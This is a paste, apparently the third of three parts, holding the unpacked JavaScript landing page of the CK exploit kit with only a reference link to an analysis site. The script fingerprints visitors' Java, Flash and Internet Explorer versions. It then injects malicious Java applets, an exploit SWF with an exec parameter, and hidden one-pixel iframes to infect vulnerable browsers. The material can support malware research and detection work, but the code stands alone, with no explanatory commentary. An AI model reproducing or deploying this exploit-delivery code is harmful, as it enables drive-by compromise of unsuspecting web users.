CK EK Unpacked and Unencrypted (3/3)

1. http://totalhash.com/analysis/0bdc19ec6207d32ed02e3c20d6b748c5dd6cde83
2.  
3. <script>
4. function encode()
5. {
6. var omg = ckl(), x1 = new Array, x2 = '';
7.  
8. for(var i=0;i<omg.length;i++)
9. {
10. if(omg[i] == 159)
11. {
12. //x2 += '';
13. }
14. else
15. {
16. x1[i] = omg[i] - 159;
17. x2 += String.fromCharCode(x1[i]);
18. }
19. }
20.  
21. return x2;
22. }
23.  
24. var wmck=deployJava.getJREs()+"";
25. wmck=parseInt(wmck.replace(/\.|\_/g,''));
26. var kaka = navigator.userAgent.toLowerCase();
27.  
28. var ckurl = encode();
29. var flashurl = ckls();
30.  
31. if( wmck > 17006 && wmck < 17011 )
32. {
33. if(kaka.indexOf("msie 6") > -1)
34. {
35. document.writeln("<object classid=\'clsid:8ad9c840-044e-11d1-b3e9-00805f499d93\' width=\'600\' height=\'400\'><param name=xiaomaolv value=\'"+ckurl+"\'><param name=bn value=\'woyouyizhixiaomaol\'><param name=si value=\'conglaiyebuqi\'><param name=bs value=\'748\'><param name=CODE value=\'xml20130422.XML20130422.class\'><param name=archive value=\'"+jaguar+"\'><\/object>");
36. }
37. else
38. {
39. document.write("<br>");
40. var gondady=document.createElement("body");
41. document.body.appendChild(gondady);
42. var gondad=document.createElement("applet");
43. gondad.width="600";
44. gondad.height="400";
45. gondad.archive=jaguar;
46. gondad.code="xml20130422.XML20130422.class";
47. gondad.setAttribute("xiaomaolv",ckurl);
48. gondad.setAttribute("bn","woyouyizhixiaomaol");
49. gondad.setAttribute("si","conglaiyebuqi");
50. gondad.setAttribute("bs","748");
51. document.body.appendChild(gondad);
52. }
53. }
54. else if( wmck >= 17000 && wmck < 17007)
55. {
56. if(kaka.indexOf("msie 6") > -1)
57. {
58. document.writeln("<object classid=\'clsid:8ad9c840-044e-11d1-b3e9-00805f499d93\' width=\'256\' height=\'256\'><param name=xiaomaolv value=\'"+ckurl+"\'><param name=bn value=\'woyouyizhixiaomaolv\'><param name=si value=\'conglaiyebuqi\'><param name=bs value=\'748\'><param name=CODE value=\'setup.hohoho.class\'><param name=archive value=\'"+audi+"\'><\/object>");
59. }
60. else
61. {
62. document.write("<br>");
63. var gondady=document.createElement("body");
64. document.body.appendChild(gondady);
65. var gondad=document.createElement("applet");
66. gondad.width="256";
67. gondad.height="256";
68. gondad.archive=audi;
69. gondad.code="setup.hohoho.class";
70. gondad.setAttribute("xiaomaolv",ckurl);
71. gondad.setAttribute("bn","woyouyizhixiaomaolv");
72. gondad.setAttribute("si","conglaiyebuqi");
73. gondad.setAttribute("bs","748");
74. document.body.appendChild(gondad);
75. }
76. }
77. else if(wmck<=16027)
78. {
79. var okokx = GTR + ".class";
80. var ckckx = document.createElement('applet');
81. ckckx.archive=benz;
82. ckckx.code=okokx;
83. ckckx.width="30";
84. ckckx.height="1";
85. document.body.appendChild(ckckx);
86. var ckcks=document.createElement('param');
87. ckcks.name="dota";
88. ckcks.value=ckurl;
89. ckckx.appendChild(ckcks);
90. }
91. else
92. {
93. function CheckVersion11() {
94. if (apple.major != 11) return false;
95. if (apple.minor == 9 && apple.rev > 900) return false;
96. if (apple.minor > 2 && apple.rev > 202 && apple.nbwm > 406) return false;
97. return true;
98. }
99.  
100. function CheckVersion12() {
101. if (apple.major != 12) return false;
102. return true;
103. }
104.  
105. function CheckVersion13() {
106. if (apple.major != 13) return false;
107. if (apple.major == 13 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 241) return false;
108. return true;
109. }
110.  
111. function CheckVersion14() {
112. if (apple.major != 14) return false;
113. if (apple.major == 14 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 179) return false;
114. return true;
115. }
116.  
117. function CheckVersion15() {
118. if (apple.major != 15) return false;
119. if (apple.major == 15 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 167) return false;
120. return true;
121. }
122.  
123. function flash_run(fu, fd) {
124. var f_use = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="60" height="1">';
125. f_use = f_use + '<param name="movie" value="' + fu + '" />';
126. f_use = f_use + '<param name="play" value="true"/>';
127. f_use = f_use + '<param name=FlashVars value="exec=FmFJ' + fd + '" />';
128. f_use = f_use + '<!--[if !IE]>-->';
129. f_use = f_use + '<object type="application/x-shockwave-flash" data="' + fu + '" allowScriptAccess=always width="60" height="1">';
130. f_use = f_use + '<param name="movie" value="' + fu + '" />';
131. f_use = f_use + '<param name="play" value="true"/>';
132. f_use = f_use + '<param name=FlashVars value="exec=FmFJ' + fd + '" />';
133. f_use = f_use + '<!--<![endif]-->';
134. f_use = f_use + '<!--[if !IE]>--></object><!--<![endif]-->';
135. f_use = f_use + '</object>';
136. document.write(f_use);
137. }
138.  
139. if ( CheckVersion11() || CheckVersion12() || CheckVersion13() || CheckVersion14() || CheckVersion15() )
140. {
141. flash_run("exp.swf", flashurl);
142. }
143. else if( (kaka.indexOf("msie 6")>-1 || kaka.indexOf("msie 7")>-1) && apple.major==10 && apple.minor==3 && apple.rev<=183 )
144. {
145. document.write("<iframe src=ww.html width=60 height=1></iframe>");
146. }
147. }
148.  
149. if(kaka.indexOf("ms"+"ie")>-1){document.write("<iframe src=main.html width=60 height=1></iframe>");}
150.  
151. </script>